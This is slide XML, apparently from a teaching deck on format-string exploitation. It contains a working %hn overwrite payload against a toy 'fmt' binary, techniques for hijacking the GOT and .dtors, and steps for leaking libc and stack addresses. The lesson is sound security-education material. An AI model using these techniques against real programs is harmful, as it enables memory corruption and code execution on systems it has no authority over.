              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2087" name="Shape 2087"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="3553500"/>
            <a:ext cx="2598400" cy="510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0x804a034</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2088" name="Shape 2088"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="40668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2089" name="Shape 2089"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267233" y="45776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Fmt str pointer</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2090" name="Shape 2090"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521800" y="1650600"/>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a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2091" name="Shape 2091"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521800" y="5175233"/>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a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2092" name="Shape 2092"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4451300" y="1838933"/>
            <a:ext cx="70664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096"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2097" name="Shape 20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98" name="Shape 2098"/>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FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>./fmt $(python2 -c 'print "\x34\xa0\x04\x08\x36\xa0\x04\x08%4911x%7$hn%65536x%8$hn"')</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You Win!</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2099" name="Shape 2099"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823000" y="34396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How to execute </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arbitrary code?</a:t>
            </a:r>
            <a:endParaRPr sz="2667" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin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Shape 210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Code Exec</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2105" name="Shape 2105"/>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ret address on stack</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.got.plt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.dtors</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1067"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>readelf -s a.out |grep DTOR</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29: 08049518 	0 OBJECT  LOCAL  DEFAULT   19 __DTOR_LIST__</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56: 0804951c 	0 OBJECT  GLOBAL HIDDEN   19 __DTOR_END__</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>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__atexit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...you name it</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="2133"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1867"/>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Shape 2110"/>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Read / write any position if map permission is allowed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GOT hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Write variable value</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leak libc base address and calculate offset to get another function address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leak libc version</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Leak stack address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2111" name="Shape 211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Usage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Shape 211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Strategy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2117" name="Shape 211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Leak Info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use %x %p to leak stack info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>To leak arbitrary addr info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If buf on stack, write addr in buf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If buf not on stack, write addr pointer on stack first, then use another printf to leak</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Write Data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If dest addr not known, leak addr first(mostly stack)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If buf on stack, use addr in buf (Libformatstr can help)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If buf not on stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Common way: use ebp-&gt;ebp pair (or sth similar) to change arbitrary addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If using snprintf, then write addr first using %n (suitable for 0x0804xxx)</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Shape 21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3" name="Shape 2123"/>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lr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: How to calculate positional param?</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A: Libc said that the behavior is undefined if positional param position is larger than provided non-positional param count. But for most case, the addr should be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="4A86E8"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>word_size x position </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>So it’s more easier to open your gdb and use pattern string to find the actual position instead of calculating. Besides, %0$x is not recognised.</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What if the second %n needs a small value to be written while bytes_written just goes larger?</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>A: Just use integer overflow. (For example, if %hn applies, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>second_padding=(second_size+65536-first_padding) % 65536 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1867"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2133"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2133"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1867"/>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Shape 212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9" name="Shape 2129"/>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buClr>
                <a:srgbClr val="0000FF"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: When can I use %n and when shouldn’t?</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>A: For printf, it’ll be too large to print out in your console(or socket if socat/xinetd used). But for snprintf, you can use %n with not too large values. (0x0804xxxx can be considered not too large) snprintf won’t overflow, but will calculate the actual value and return actual bytes_written.</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Can I modify more than 1 values on stack within a single format string?</a:t>
            </a:r>
            <a:endParaRPr sz="1867">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-423323">
              <a:buSzPts val="1400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867"/>
              <a:t>A: Definitely you can.But if you want the second value addr to be based on the first modified value, there are some tricks here: The first %n must not be positional param. That’s because In libc implementation, the positional values are copied into an internal struct in function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>printf_positional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> before applying fmt transformation.</a:t>
            </a:r>
            <a:endParaRPr sz="1867">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53381" y="1240934"/>
            <a:ext cx="82852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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Shape 740">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB5F305-A1DB-4C02-BDEF-DC6932DB5002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6388014" y="2416947"/>
            <a:ext cx="3580234" cy="3707900"/>
            <a:chOff x="4897550" y="1085100"/>
            <a:chExt cx="2768700" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Shape 741">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{224FE4C8-1E87-428D-AF07-083B8BF5CFE8}"/>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9" name="Shape 742">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FFAF310-7ADD-4648-AC81-A755F5404CB6}"/>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13" name="Shape 743">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F579983-D946-419B-9E9A-CAC8423EC60E}"/>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Shape 744">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAE967AF-B2C7-4C2E-A3CF-DCF61E9CCE05}"/>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shared libraries</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Shape 745">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C4FD20-8637-4BD7-BCA0-E25276816B1B}"/>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Shape 746">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010999C0-C7EE-4429-80E6-4D7C1F73C6DD}"/>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7" name="Shape 747">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D47F4C6-7252-41C7-A01C-95FF5B1D73A4}"/>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8" name="Shape 748">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3064F38-82FD-43F8-8742-542BED83C265}"/>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a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Shape 749">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FFC1073-413A-4427-B54D-090BD34DFF40}"/>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20" name="Shape 750">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DC2CBF9-E21C-48AD-8569-4F9B50ABA1E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="13"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751">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E80FE881-313C-474F-B090-9586544F7ED9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="16"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22" name="Shape 752">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB3339EC-C1FE-4AF0-96D7-86ADFB18395E}"/>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23" name="Shape 753">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AEC428-84EE-42EB-9CB0-38DC942D41B6}"/>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0xC0000000</a:t>
              </a:r>
              <a:endParaRPr sz="1000">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Shape 754">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E23F1A5D-9C35-4822-BED5-F09A0BF4E96C}"/>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5" name="Shape 755">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1599F529-BFA5-4492-89D1-C9B84595ADE6}"/>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6" name="Shape 756">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02CB3132-6F87-44F7-86BB-A45C4F89CCD3}"/>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7" name="Shape 757">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55AFF7F8-A0A7-4552-9B06-FB5BF3290976}"/>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8" name="Shape 758">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0228E6C0-C255-441C-933B-11D668E2B58E}"/>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9" name="Shape 759">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73BAE51A-DD40-47C5-AA6C-9A20CC5E0449}"/>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30" name="Shape 760">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AC64E16-F6E5-4F12-B821-7AA037709445}"/>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31" name="Shape 761">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96561190-968D-465E-B74B-FCFE807386CD}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 762">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4D6AF9C-5930-4157-B3CD-59F50CF4CC9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="2570571"/>
            <a:ext cx="1762768" cy="597979"/>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other sections</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Shape 763">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B01A4FC4-9A21-43E3-9524-362A2AAED8C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="31432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34" name="Shape 764">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5E22253-626D-4699-B651-710FA5240417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="34174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.bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 765">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20D55B9A-073A-4EF4-BDA4-4F9B7D4A26C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="36916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.got.plt</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Shape 766">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{204E7B2E-696E-47C2-8A5F-F13B877F31EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="39658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.rodata</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Shape 767">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C86299-3DCD-4BF7-9315-C5F6009304BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="42400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38" name="Shape 768">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{622F611F-DB18-4938-B443-5F61B8BF9D9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="45142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.init</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 769">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53626037-B023-4273-8188-3B29C3ED9372}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2991963" y="47884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ELF Header</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Shape 770">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F96FAD1E-CDF1-4579-B03E-C1F4C9C64729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754731" y="3143270"/>
            <a:ext cx="369310" cy="831198"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
